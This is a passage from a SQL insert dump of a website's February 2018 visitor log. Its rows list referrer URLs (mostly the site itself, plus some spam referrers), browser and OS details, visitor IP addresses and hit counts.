g','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(24329,'2018-02-23','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(24330,'2018-02-23','https://pills24h.com/buy-clonidine-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',1,0),(24331,'2018-02-23','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','197.207.129.219','000',2,0),(24332,'2018-02-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.108','','155.178.180.14','000',13,0),(24333,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.120','000',2,0),(24334,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',2,0),(24335,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',1,0),(24336,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(24337,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',1,0),(24338,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',2,0),(24339,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',3,0),(24340,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(24341,'2018-02-23','https://zphiblgz.org','Chrome','Windows','64.0.3282.168','','208.76.113.2','000',4,0),(24342,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',1,0),(24343,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',1,0),(24344,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.182','000',1,0),(24345,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',1,0),(24346,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',1,0),(24347,'2018-02-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','167.102.191.10','000',12,0),(24348,'2018-02-23','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','195.22.127.224','000',22,0),(24349,'2018-02-23','https://zphiblgz.org/','Safari','iPhone','11.0','','173.67.16.175','000',2,0),(24350,'2018-02-23','https://www.google.com/','Chrome','Android','64.0.3282.137','','172.58.185.59','000',6,0),(24351,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',1,0),(24352,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(24353,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',2,0),(24354,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.113','000',1,0),(24355,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',2,0),(24356,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.78','000',1,0),(24357,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',1,0),(24358,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',1,0),(24359,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',1,0),(24360,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',3,0),(24361,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.70','000',1,0),(24362,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',1,0),(24363,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.196','000',3,0),(24364,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',1,0),(24365,'2018-02-23','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','198.51.197.174','000',1,0),(24366,'2018-02-23','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.13.17','000',4,0),(24367,'2018-02-23','https://zphiblgz.org/history/','Safari','iPhone','11.0','','174.205.6.243','000',1,0),(24368,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',2,0),(24369,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',1,0),(24370,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(24371,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(24372,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',2,0),(24373,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',1,0),(24374,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(24375,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.28','000',2,0),(24376,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',1,0),(24377,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.176','000',1,0),(24378,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.113','000',1,0),(24379,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.18','000',1,0),(24380,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.92','000',2,0),(24381,'2018-02-23','https://zphiblgz.org/scholarship/application/','AppleWebKit','Windows','534','','131.253.27.147','000',1,0),(24382,'2018-02-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','100.16.219.197','000',7,0),(24383,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',2,0),(24384,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(24385,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.134','000',2,0),(24386,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.245','000',2,0),(24387,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',1,0),(24388,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(24389,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.203','000',1,0),(24390,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.202','000',2,0),(24391,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.120','000',1,0),(24392,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',1,0),(24393,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.80','000',1,0),(24394,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.194','000',1,0),(24395,'2018-02-23','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(24396,'2018-02-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(24397,'2018-02-23','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',1,0),(24398,'2018-02-23','http://uralsk.xkaz.org/','MSIE','Windows','5.5','','134.249.48.151','000',1,0),(24399,'2018-02-23','https://www.bing.com/','MSIE','Windows','11.0','','159.142.31.94','000',4,0),(24400,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.16','000',2,0),(24401,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.86','000',2,0),(24402,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.192','000',1,0),(24403,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',2,0),(24404,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(24405,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',2,0),(24406,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',1,0),(24407,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(24408,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.113','000',2,0),(24409,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(24410,'2018-02-23','https://zphiblgz.org','Firefox','Android','58.0','','108.56.0.231','000',2,0),(24411,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.172.223','000',8,0),(24412,'2018-02-23','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.172.223','000',1,0),(24413,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.51','000',2,0),(24414,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.54','000',1,0),(24415,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.147','000',2,0),(24416,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.206','000',1,0),(24417,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',1,0),(24418,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.218','000',3,0),(24419,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.48','000',1,0),(24420,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(24421,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(24422,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(24423,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.139','000',1,0),(24424,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.240.133.227','000',2,0),(24425,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',2,0),(24426,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',4,0),(24427,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',2,0),(24428,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',1,0),(24429,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.51','000',2,0),(24430,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(24431,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',1,0),(24432,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',4,0),(24433,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(24434,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',2,0),(24435,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',2,0),(24436,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',2,0),(24437,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',2,0),(24438,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',5,0),(24439,'2018-02-23','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.39.16','000',3,0),(24440,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',3,0),(24441,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',4,0),(24442,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(24443,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(24444,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',1,0),(24445,'2018-02-23','https://zphiblgz.org','Safari','iPhone','9.0','','166.137.244.127','000',1,0),(24446,'2018-02-23','https://zphiblgz.org','Safari','iPhone','9.0','','107.77.204.57','000',2,0),(24447,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(24448,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(24449,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',1,0),(24450,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',2,0),(24451,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',1,0),(24452,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.147','000',1,0),(24453,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.150','000',1,0),(24454,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.64','000',1,0),(24455,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.92','000',1,0),(24456,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.208','000',1,0),(24457,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.28','000',1,0),(24458,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.130','000',1,0),(24459,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',1,0),(24460,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',1,0),(24461,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',3,0),(24462,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',2,0),(24463,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',1,0),(24464,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',3,0),(24465,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(24466,'2018-02-23','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.232.245','000',3,0),(24467,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',1,0),(24468,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(24469,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(24470,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(24471,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',2,0),(24472,'2018-02-23','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.204.58','000',2,0),(24473,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',3,0),(24474,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(24475,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(24476,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',1,0),(24477,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',1,0),(24478,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(24479,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',3,0),(24480,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(24481,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(24482,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.244','000',2,0),(24483,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',1,0),(24484,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.21','000',1,0),(24485,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.16','000',1,0),(24486,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',2,0),(24487,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.207','000',2,0),(24488,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(24489,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',1,0),(24490,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',4,0),(24491,'2018-02-23','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.42','000',2,0),(24492,'2018-02-23','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.178','000',1,0),(24493,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(24494,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',2,0),(24495,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(24496,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',2,0),(24497,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(24498,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',1,0),(24499,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',3,0),(24500,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',1,0),(24501,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.145','000',1,0),(24502,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',1,0),(24503,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(24504,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',1,0),(24505,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',3,0),(24506,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',1,0),(24507,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(24508,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',1,0),(24509,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',1,0),(24510,'2018-02-23','https://www.google.com/','Chrome','Windows','64.0.3282.168','','66.44.94.194','000',2,0),(24511,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(24512,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(24513,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',2,0),(24514,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',1,0),(24515,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',1,0),(24516,'2018-02-23','https://zphiblgz.org','Go--client','Unknown','1.1','','138.197.72.0','000',2,0),(24517,'2018-02-23','http://www.club-lukojl.ru/','MSIE','Unknown','6.0','','134.249.48.151','000',3,0),(24518,'2018-02-23','https://zphiblgz.org','Microsoft','Unknown','Unknown','','165.225.38.202','000',1,0),(24519,'2018-02-23','https://zphiblgz.org','MSIE','Windows','7.0','','165.225.38.202','000',2,0),(24520,'2018-02-23','https://zphiblgz.org','MSIE','Windows','11.0','','165.225.38.202','000',1,0),(24521,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.140.210','000',1,0),(24522,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(24523,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',1,0),(24524,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',3,0),(24525,'2018-02-23','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1707.8fBbsaUfMw7oMoJ55TVexbCn9vC67C-L-Cd1fZV9sJDwL4DgzmbJWUyl9C9txDn1.a3a423ae85988f8629550d9695a247777f01636b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VlluLWZTNElnWWJoS200MGc5b3NwN05rZXNEVFVGS3VkblNBTzdoUU05bExBYTY3c3FGNWdEcw&b64e=2&sign=de08a267e7d2fa4779d9dc200a6b9ad4&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6HwRlp7B3pAqHSLz65aesdfTM8kKmQgo3eWD5mlYUJii6k23Bmd8r6TAd8P8zc6Y8Flv_fq4FPLBnV98x733e3QmwFncVFNikmn9XT2nfl6gtAGDp3N3_OA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs69bnDwkGNy_aPPm-UJnRrKMdZ325OhZf9bbsyTxcstyYsXAbQ9DQHxzisYvaeAyoQ&l10n=ru&cts=1519444764877&mc=6.35073213636','MSIE','Windows','10.0','','94.180.132.51','000',1,0),(24526,'2018-02-23','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1707.AivXwT6V-RkGjITDn0F4rAgLN9UiD6Cv2Iib6wp3YerPmDB9qge3xpd2Nb7qMRlC.57e965d5711198da2b14d2a73e5b6032bda022d7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VlluLWZTNElnWWJoYU9hbEx6aVpMVWFzYlZoejkzbk1ndVZWdUtJNHlnOVF0S3dwdmdnSzJ6WQ&b64e=2&sign=c732470f4c9f80a9bf74ff20290878e2&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTMGa7M0Y8FMHdaEVw_snvJjZLD_ZGcruCKwT8kuFj8Yj8T7DeXK-vW5d7FECjvsRXEkykjohLPODBN2tBd5zg6BRzC3Wwp5LJV8DGKddzUsC2e4DFGHZinA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW8s5kfnNkNj0FqQEIcHUcjmMfvM6xh7xPk89quktMfCqELKSekYMiKZwqmZIdECgD2z6LNmOddow&l10n=ru&cts=1519444764876&mc=6.75916765076','MSIE','Windows','10.0','','95.221.54.151','000',1,0),(24527,'2018-02-23','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(24528,'2018-02-23','http://msu.kharkov.ua/','MSIE','Unknown','7.0b','','37.115.112.228','000',2,0),(24529,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',1,0),(24530,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',1,0),(24531,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(24532,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(24533,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',3,0),(24534,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(24535,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','181.222.50.176','000',2,0),(24536,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',6,0),(24537,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',2,0),(24538,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',1,0),(24539,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(24540,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(24541,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',4,0),(24542,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',2,0),(24543,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',3,0),(24544,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',2,0),(24545,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(24546,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.195','000',3,0),(24547,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.49','000',3,0),(24548,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',2,0),(24549,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',3,0),(24550,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',1,0),(24551,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.93','000',2,0),(24552,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.176','000',1,0),(24553,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.54','000',1,0),(24554,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.212','000',2,0),(24555,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.104','000',1,0),(24556,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.227','000',1,0),(24557,'2018-02-24','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.7','000',1,0),(24558,'2018-02-24','https://www.google.com/','Safari','iPhone','11.0','','73.212.74.34','000',3,0),(24559,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','49.248.120.115','000',2,0),(24560,'2018-02-24','https://zphiblgz.org/','Safari','iPhone','11.0','','98.117.57.119','000',2,0),(24561,'2018-02-24','http://pornosemki.info/','MSIE','Windows','4.01','','134.249.48.151','000',2,0),(24562,'2018-02-24','https://pills24h.com/buy-doxycycline-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',4,0),(24563,'2018-02-24','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.240','000',1,0),(24564,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.192','000',2,0),(24565,'2018-02-24','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.20','000',1,0),(24566,'2018-02-24','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.243','000',1,0),(24567,'2018-02-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.243.105.247','000',5,0),(24568,'2018-02-24','https://www.google.com/','Chrome','Android','64.0.3282.137','','173.64.82.121','000',2,0),(24569,'2018-02-24','https://zphiblgz.org','Chrome','Chrome OS','61.0.3163.140','','178.62.153.200','000',3,0),(24570,'2018-02-24','https://zphiblgz.org','Safari','iPhone','10.0','','96.255.152.231','000',7,0),(24571,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','103.105.95.14','000',2,0),(24572,'2018-02-24','http://skinali.photo-clip.ru/','MSIE','Windows','6.0','','178.137.16.45','000',4,0),(24573,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',3,0),(24574,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',3,0),(24575,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.119','000',3,0),(24576,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(24577,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',3,0),(24578,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',3,0),(24579,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',2,0),(24580,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(24581,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',3,0),(24582,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',4,0),(24583,'2018-02-24','https://zphiblgz.org','Un